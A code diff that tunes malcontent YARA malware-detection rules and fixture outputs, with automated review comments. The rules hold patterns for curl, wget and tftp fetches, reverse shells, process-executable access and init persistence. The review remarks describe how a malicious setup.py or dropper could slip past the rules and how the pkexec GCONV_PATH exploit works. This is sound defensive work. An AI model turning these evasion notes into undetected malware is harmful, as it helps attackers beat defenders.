@@ -16,11 +17,30 @@ rule proc_d_exe: medium { strings: $digit = "/proc/%d/exe" fullword $not_cgroup = "cgroup" fullword - $not_tool = /[Uu]sage:/ fullword + $not_tool = /[Uu]sage:/ fullword + condition: $digit and none of ($not*) } +rule proc_d_exe_high: high { + meta: + description = "accesses underlying executable of other processes" + + strings: + $ref = "/proc/%d/exe" fullword + + $o_sign = "/etc/init.d" + $o_net_dev = "/proc/net/dev" + $o_bash = "/bin/bash" + $o_tty = "/dev/tty" + $o_var_tmp = "/var/tmp" + $o_osrelease = "/proc/sys/kernel/osrelease" + + condition: + filesize < 5MB and $ref and any of ($o*) +} + rule proc_py_exe: high { meta: description = "accesses underlying executable of other processes" diff --git a/rules/hw/dev/kmem.yara b/rules/hw/dev/kmem.yara index 0f555caba..5110cda09 100644 --- a/rules/hw/dev/kmem.yara +++ b/rules/hw/dev/kmem.yara @@ -9,6 +9,7 @@ rule kmem: high bsd { // entries from include/paths.h $not_cshell = "_PATH_CSHELL" fullword $not_rwho = "_PATH_RWHODIR" fullword + $not_lsof = "lsof" fullword condition: $val and none of ($not*) diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara index 16e8e5017..939fa1d9e 100644 --- a/rules/hw/dev/sd_mmc.yara +++ b/rules/hw/dev/sd_mmc.yara @@ -18,7 +18,8 @@ rule dev_mmc_ok: override { strings: $not_fwupd = "fu_firmware_set_id" $not_ipmi = "/dev/ipmi" - $not_grub = "GRUB" fullword + $not_grub = "GRUB" fullword + condition: dev_mmc and any of them } diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara index bf858ad27..6756140a9 100644 --- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara 
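Review bot: `proc_d_exe_high` reuses the exact description of `proc_d_exe` (`"accesses underlying executable of other processes"`), so an analyst sees two findings with identical text at different severities and no hint that the high one requires a co-occurring `/bin/bash`, `/dev/tty`, `/var/tmp`, `/etc/init.d`, `/proc/net/dev` or `osrelease` string; say so, e.g. `description = "accesses executable of other processes alongside shell, tty, init or temp paths"`. It also drops the `$not_cgroup`/`$not_tool` guards that `proc_d_exe` keeps, which is presumably why this patch had to add `proc_d_exe_high = "medium"` overrides for sudo, libbpf and the ptrace tools — carrying `$not_tool = /[Uu]sage:/ fullword` forward is cheaper than a growing override list. `$o_sign = "/etc/init.d"` is misnamed; `$o_init_d` reads better.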
@@ -10,13 +10,16 @@ rule ubi: high linux { any of them } -rule expected_ubi_users : override { - meta: - ubi = "medium" - strings: - $libuboot = "libuboot" - $usage = "Usage:" - $ubi = "ubifs" fullword - condition: - filesize < 120KB and any of them -} \ No newline at end of file +rule expected_ubi_users: override { + meta: + ubi = "medium" + + strings: + $libuboot = "libuboot" + $usage = "Usage:" + $ubi = "ubifs" fullword + $UBI = "UBI version" + + condition: + filesize < 512KB and any of them +} diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara index 929e2f263..86076f55d 100644 --- a/rules/impact/degrade/firewall.yara +++ b/rules/impact/degrade/firewall.yara @@ -18,7 +18,8 @@ rule selinux_firewall: high linux { $not_selinux_init = "SELINUX_INIT" $not_define = "#define" fullword $not_netlink = "NETLINK" fullword - $not_containerd = "containerd" fullword + $not_containerd = "containerd" fullword + condition: filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/impact/exploit/GCONV_PATH.yara b/rules/impact/exploit/GCONV_PATH.yara index f086ac0f1..ffb449398 100644 --- a/rules/impact/exploit/GCONV_PATH.yara +++ b/rules/impact/exploit/GCONV_PATH.yara @@ -1,4 +1,4 @@ -rule gconv_path: low { +rule gconv_path: harmless { meta: description = "references character conversion configuration" diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 04a8ea70d..98612b88f 100644 --- a/rules/impact/remote_access/backdoor.yara +++ b/rules/impact/remote_access/backdoor.yara @@ -20,8 +20,10 @@ rule backdoor: high { strings: $ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword - $not_vcpu = "VCPUInfoBackdoor" - $not_vmware = "gGuestBackdoorOps" + $not_vcpu = "VCPUInfoBackdoor" + $not_vmware = "gGuestBackdoorOps" + $not_comment = "# backdoor:" + condition: filesize < 40MB and any of them and not wordlist and none of ($not*) } 
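Review bot: Demoting `gconv_path` from `low` to `harmless` removes the only signal on `GCONV_PATH`, yet the rule sits under `impact/exploit` for a reason — the public pkexec (CVE-2021-4034) exploit chain sets `GCONV_PATH` so that glibc loads an attacker-supplied `gconv-modules` shared object, and the same trick is reused by other local-privilege-escalation payloads. The body of the rule is outside this hunk, so I cannot see which false positive drove the change; rather than neutralising it wholesale, keep `low` and add `$not_*` exclusions for the iconv/glibc tooling that triggered it, or add a sibling rule at high that requires `GCONV_PATH` together with `gconv-modules` and a `.so`/`dlopen` string. The `tests/linux/2024.gas/gas.simple` change later in this patch (`impact/exploit/GCONV_PATH: low` removed) shows the coverage lost on an existing sample.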
diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara index 53b6119d2..93a5f3c99 100644 --- a/rules/impact/remote_access/net_term.yara +++ b/rules/impact/remote_access/net_term.yara @@ -92,7 +92,8 @@ rule miner_kvryr_stak_alike: high { $f_execve = "execve" $f_numa = "NUMA" - $not_perf = "PERF_RECORD" + $not_perf = "PERF_RECORD" + condition: filesize < 12MB and all of ($f*) and none of ($not*) } diff --git a/rules/impact/remote_access/py_setuptools.yara b/rules/impact/remote_access/py_setuptools.yara index f58daf7d9..15134cf47 100644 --- a/rules/impact/remote_access/py_setuptools.yara +++ b/rules/impact/remote_access/py_setuptools.yara @@ -14,7 +14,7 @@ private rule pythonSetup { $not_distutils = "from distutils.errors import" condition: - filesize < 128KB and $setup and any of ($i*) and none of ($not*) + filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*) } rule setuptools_oslogin: medium { diff --git a/rules/impact/remote_access/reverse_shell.yara b/rules/impact/remote_access/reverse_shell.yara index dbaaa9df1..457354201 100644 --- a/rules/impact/remote_access/reverse_shell.yara +++ b/rules/impact/remote_access/reverse_shell.yara @@ -32,8 +32,10 @@ rule possible_reverse_shell: medium { $sh_bash = "/bin/bash" $sh = "/bin/sh" + $not_uc2 = "ucs2reverse" + condition: - filesize < 4MB and any of ($sh*) and all of ($f*) + filesize < 4MB and any of ($sh*) and all of ($f*) and none of ($not*) } rule mkfifo_netcat: critical { diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara index fe132d1d4..46f74f9d1 100644 --- a/rules/net/download/fetch.yara +++ b/rules/net/download/fetch.yara 
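Review bot: Restricting the import match to `any of ($i*) in (0..1024)` hands a malicious `setup.py` a one-line evasion — pad the module docstring or licence header past 1 KiB and every rule built on the private `pythonSetup` (such as `setuptools_oslogin` directly below) goes quiet — while legitimate packages with long headers also drop out. If the intent is to require the import near the top of the file, use a wider window (`in (0..8192)`) or anchor on the `$setup` occurrence instead, e.g. `$setup and for any i in (1..#setup): (any of ($i*) in (0..@setup[i]))`. Whatever bound you keep, a comment on that line stating the trade-off would make the evasion surface a documented choice rather than an accident.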
@@ -47,33 +47,33 @@ rule fetch_tool: medium { description = "calls a URL fetch tool" strings: - $t_curl_O = "curl -O" - $t_curl_o = "curl -o" - $t_wget = "wget -" - $t_wget_http = "wget http" - $t_quiet_output = "-q -O " - $t_kinda_curl_o = "url -o " - $t_kinda_curl_O = "url -O " - $t_kinda_curl_silent_insecure = "silent --insecure" - $t_kinda_curl_qk = /url.{0,4}-k -q/ - $t_ftp = "ftp -" - $t_tftp = "tftp " - $t_ftpget = "ftpget " fullword + $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.]{0,32}/ + $t_wget = /wget [ \w\:\/\-\.]{4,32}/ + $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.]{0,32}/ + $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/ + $t_tftp = /tftp [ \w\:\/\-\.]{0,32}/ condition: - filesize < 5MB and any of ($t_*) + filesize < 1MB and any of ($t_*) } -rule executable_calls_fetch_tool: high { +rule binary_calls_fetch_tool: high { meta: - description = "executable that calls a fetch tool" + description = "binary calls fetch tool" filetypes = "macho,elf" strings: - $not_tftp = "Illegal TFTP operation" + $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.\"]{0,32}/ + $t_wget = /wget [ \w\:\/\-\.\"]{4,32}/ + $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.\"]{0,32}/ + $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/ + $t_tftp = /tftp [ \w\:\/\-\.\"]{0,32}/ + + $not_tftp = "Illegal TFTP operation" + $not_tftp_err = "tftp error" condition: - filesize < 5MB and (elf or macho) and fetch_tool and none of ($not*) + filesize < 10MB and (elf or macho) and any of ($t*) and none of ($not*) } rule curl_agent_val: high { @@ -138,7 +138,7 @@ rule high_fetch_command_val: high { $not_s_key = "curl -s --key" $not_local = "curl -ks https://localhost" $not_continue = "--continue-at" - $not_pciid = "https://pci-ids.ucw.cz" + $not_pciid = "https://pci-ids.ucw.cz" $x_chmod = "chmod" fullword $x_Chmod = "Chmod" fullword 
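Review bot: The flag-pair regexes in both rules require a space before the first flag that the `[a-z]url ` prefix has already consumed: `/[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) .../` needs two spaces after `curl` when nothing sits between, so a plain `curl --silent --insecure http://x` matches none of the five patterns (the `-[oOk] ` form needs a single-letter flag), whereas the old `"silent --insecure"` literal caught it. Drop the stray space so the optional run absorbs it — `$t_curl_qk = /[a-z]url [-\w ]{0,16}-(-silent|q) -(-insecure|k) [ \w\:\/\-\.]{0,32}/` — and likewise for `$t_curl_kq`; in `binary_calls_fetch_tool` the `$t_curl_kq` class also lacks the `\"` its three siblings allow. Note that the new forms only fire when the tool name and its flags sit in one string, so binaries that assemble argv from separate literals (common in droppers) are now invisible here, which the old `"-q -O "` and `"url -o "` fragments partly covered.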
diff --git a/rules/net/ftp/tftp.yara b/rules/net/ftp/tftp.yara new file mode 100644 index 000000000..b1f17f574 --- /dev/null +++ b/rules/net/ftp/tftp.yara @@ -0,0 +1,11 @@ +rule tftp { + meta: + description = "Trivial File Transfer Protocol (TFTP)" + + strings: + $ref = "tftp" fullword + $ref2 = "TFTP" fullword + + condition: + filesize < 1MB and any of them +} diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara index c5e81ba18..f135f28a2 100644 --- a/rules/persist/kernel_module/symbol-lookup.yara +++ b/rules/persist/kernel_module/symbol-lookup.yara @@ -46,9 +46,10 @@ rule bpf: override linux { description = "libbpf" filetypes = "so,elf" kallsyms_lookup = "medium" + proc_d_exe_high = "medium" strings: - $ref = "BPF" fullword + $ref = "BPF" fullword $ref2 = "LIBBPF" fullword condition: diff --git a/rules/persist/sysv/sysv.yara b/rules/persist/sysv/sysv.yara new file mode 100644 index 000000000..aac9e05dc --- /dev/null +++ b/rules/persist/sysv/sysv.yara @@ -0,0 +1,11 @@ +rule sysv_persist: high { + meta: + description = "installs arbitrary files into SYSV-style init directories" + + strings: + $rc_d = "/etc/rc%d.d/S%d%s" + $init_d = "/etc/init.d/%s" + + condition: + filesize < 5MB and any of them +} diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index d973aaddd..8837659fb 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -2,7 +2,6 @@ 3P/threat_hunting/powershell: medium c2/addr/ip: medium c2/addr/server: medium -c2/server_address: medium collect/archives/unarchive: medium collect/databases/mysql: medium collect/databases/postgresql: medium 
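Review bot: Extending the `bpf` override to `proc_d_exe_high` keys a high-severity downgrade on `$ref = "BPF" fullword` (the condition is outside this hunk, so I cannot tell whether `$ref2` is also required); a three-letter uppercase token is an easy thing for a sample to carry, and `known_ptrace_injectors` in `rules/evasion/process_injection/ptrace.yara` adds the same `"BPF"` exclusion in this patch, so two overrides now pivot on it. Prefer `$ref2 = "LIBBPF"` or a libbpf-only symbol such as `"bpf_object__open"` as the trigger for the new key, and note in a comment which libbpf code path trips `proc_d_exe_high` so the override can be revisited.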
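Review bot: `sysv_persist: high` fires on the printf templates `"/etc/rc%d.d/S%d%s"` and `"/etc/init.d/%s"` alone (`any of them`, any file under 5MB), but those templates are exactly what init-script managers format — `chkconfig`, `insserv`, `update-rc.d`, `service` and systemd's sysv-generator enumerate the same paths — so the description `"installs arbitrary files into SYSV-style init directories"` overstates what the strings show (path construction, not a write). Either require both strings plus a write primitive (add `$w_*` strings for `fopen`/`rename`/`symlink`/`chmod` and use `all of ($rc_d, $init_d) and any of ($w*)`) or add `$not_*` markers for the known managers and lower a single-string hit to medium. Also consider anchoring so `/etc/init.d/%s` inside a larger status message such as `"status %s: /etc/init.d/%s"` is not counted as installation.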
@@ -22,7 +21,7 @@ data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index fd567afc4..b1504d031 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -2,7 +2,7 @@ 3P/threat_hunting/powershell: medium anti-static/obfuscation/js: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/unarchive: medium collect/databases/mysql: medium collect/databases/postgresql: medium @@ -23,7 +23,7 @@ data/hash/md5: low data/random/insecure: low discover/group/lookup: medium discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index a6b8442a6..17b967ce3 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -12,7 +12,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 5bb3f1e5c..054657623 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple 
+++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -12,7 +12,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index a4cf97734..3b7669d02 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -10,7 +10,7 @@ data/encoding/base64: low data/encoding/reverse: low data/random/insecure: low discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md index 2c6aa011c..435fce245 100644 --- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md +++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md 
@@ -1,8 +1,7 @@ ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| -| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | -| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| +| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 57f5fa934..082d8ea1a 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md 
@@ -1,8 +1,7 @@ ## linux/2023.ConnectBack/tiny [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| -| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | -| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| +| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index 7e125dabc..1d1bb23b2 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple 
@@ -21,8 +21,8 @@ evasion/bypass_security/linux/se_disable: high
 evasion/bypass_security/linux/ufw: medium
 evasion/file/location/dev_shm: critical
 evasion/file/location/var_tmp: medium
-evasion/file/prefix: high
 evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
 evasion/hijack_execution/etc_ld.so.preload: high
 evasion/logging/syslog: medium
 evasion/mimicry/fake_process: critical
diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
index 1e8293eaa..71b80807d 100644
--- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
+++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
@@ -59,7 +59,7 @@ net/dns: low
 net/dns/servers: low
 net/dns/txt: low
 net/download: medium
-net/download/fetch: medium
+net/download/fetch: high
 net/http/2: low
 net/http/accept_encoding: low
 net/http/auth: low
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 2765835ac..695a98f23 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -2,6 +2,7 @@
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 discover/system/cpu_info: low
+discover/system/dev_full: medium
 discover/system/platform: low
 discover/system/sysinfo: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
@@ -25,9 +26,7 @@ fs/proc/sys_kernel_osrelease: medium
 fs/tempdir: low
 fs/tempdir/TMPDIR: low
 hw/cpu: medium
-impact/exploit/GCONV_PATH: low
 impact/remote_access/dl_iterate: high
-impact/remote_access/reverse_shell: medium
 net/socket/send: low
 net/url/embedded: low
 process/create: low
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json
index 3f5fcee65..6df73c88c 100644
--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json
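Review bot: `impact/remote_access/reverse_shell: medium` drops out of gas.simple in the second hunk here and out of the medusa rkload.simple hunk further down, with nothing added in its place, and the diffstat visible for this patch does not list a reverse_shell rule change. Two malware samples silently losing a remote-access finding is worth a second look; if the rule was tightened on purpose, a sentence in the description saying so (and why these samples no longer qualify) would keep the fixture diffs from reading as a regression. The parallel removal of `impact/exploit/GCONV_PATH: low` across clean and malicious fixtures alike looks like a deliberate rule retirement and probably only needs the same mention.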
@@ -89,17 +89,6 @@
 "ID": "fs/proc/arbitrary_pid",
 "RuleName": "proc_arbitrary"
 },
- {
- "Description": "accesses underlying executable of other processes",
- "MatchStrings": [
- "/proc/%s/exe"
- ],
- "RiskScore": 3,
- "RiskLevel": "HIGH",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_s_exe",
- "ID": "fs/proc/pid_exe",
- "RuleName": "proc_s_exe"
- },
 {
 "Description": "access process memory maps",
 "MatchStrings": [
diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index 0c30336b6..bd35f027d 100644
--- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -42,8 +42,8 @@ discover/user/USER: low
 discover/user/name_get: medium
 evasion/file/location/chdir_unusual: medium
 evasion/file/location/dev_shm: medium
-evasion/file/prefix: high
 evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/current_logins: medium
 evasion/logging/hide_shell_history: high
diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple
index 4950c2eed..3cbd303b1 100644
--- a/tests/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple
@@ -1,7 +1,7 @@
 # linux/2024.kworker_pretenders/gafgyt: critical
 3P/elastic/mirai: critical
 3P/threat_hunting/base64: medium
-anti-static/packer/elf: high
+anti-static/elf/content: high
 credential/ssh/d: medium
 data/base64/external: medium
 data/encoding/base64: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index 3c878f390..bac6337eb 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -5,6 +5,7 @@ anti-behavior/LD_PROFILE: medium
 anti-static/xor/commands: high
 credential/ssh/d: medium
 discover/system/cpu_info: low
+discover/system/dev_full: medium
 discover/system/sysinfo: medium
 evasion/file/location/dev_shm: high
 evasion/file/location/lib: high
@@ -39,8 +40,6 @@ fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TMPDIR: low
 hw/cpu: medium
-impact/exploit/GCONV_PATH: low
-impact/remote_access/reverse_shell: medium
 malware/family/medusa: critical
 net/socket/local_addr: low
 net/socket/send: low
diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff
index 08e466ca4..502e9857c 100644
--- a/tests/linux/2024.sbcl.market/sbcl.sdiff
+++ b/tests/linux/2024.sbcl.market/sbcl.sdiff
@@ -17,10 +17,10 @@
 -fs/permission/modify
 -fs/proc/self_exe
 -fs/symlink_resolve
+-hw/dev/ubi
 -net/url/embedded
 ++++ added: sbcl.dirty
 +anti-static/elf/entropy
-+anti-static/packer/high_entropy
 +data/compression/zstd
 +data/embedded/zstd
 +discover/user/HOME
diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
index 2b97f9fd3..4d90726f1 100644
--- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
+++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
@@ -1,7 +1,7 @@
 # linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical
+anti-static/elf/content: high
 anti-static/elf/entropy: high
-anti-static/packer/elf: high
-anti-static/packer/high_entropy: medium
+anti-static/elf/header: high
 anti-static/packer/upx: high
 c2/addr/ip: high
 credential/sniffer/bpf: medium
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index 0b0edb9e0..08b10ab08 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -1,11 +1,11 @@ ## linux/UPX/06ed158 [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| -| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.4) | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | -| HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | -| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|--------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| +| HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing 
symbols) | |
+| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy ELF binary (>7.4) | |
+| HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | |
+| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) |
diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple
index 5a9782f48..08541cf86 100644
--- a/tests/linux/clean/appsec-rules.json.simple
+++ b/tests/linux/clean/appsec-rules.json.simple
@@ -19,7 +19,7 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: high
+discover/system/network: medium
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
@@ -28,7 +28,6 @@ evasion/file/prefix: medium
 evasion/logging/acct: low
 evasion/process_injection/readelf: medium
 exec/plugin: low
-exec/shell/bash_dev_tcp: high
 exec/shell/bash_dev_udp: medium
 exec/shell/nohup: medium
 exec/system_controls/apparmor: medium
@@ -54,6 +53,7 @@ impact/exploit/cve: medium
 impact/remote_access/iptables: medium
 net/dns/servers: low
 net/download: medium
+net/ftp/t: low
 net/http/cookies: medium
 net/socket/connect: medium
 net/tcp/sftp: medium
diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple
index 19b37a061..37746918e 100644
--- a/tests/linux/clean/busybox.simple
+++ b/tests/linux/clean/busybox.simple
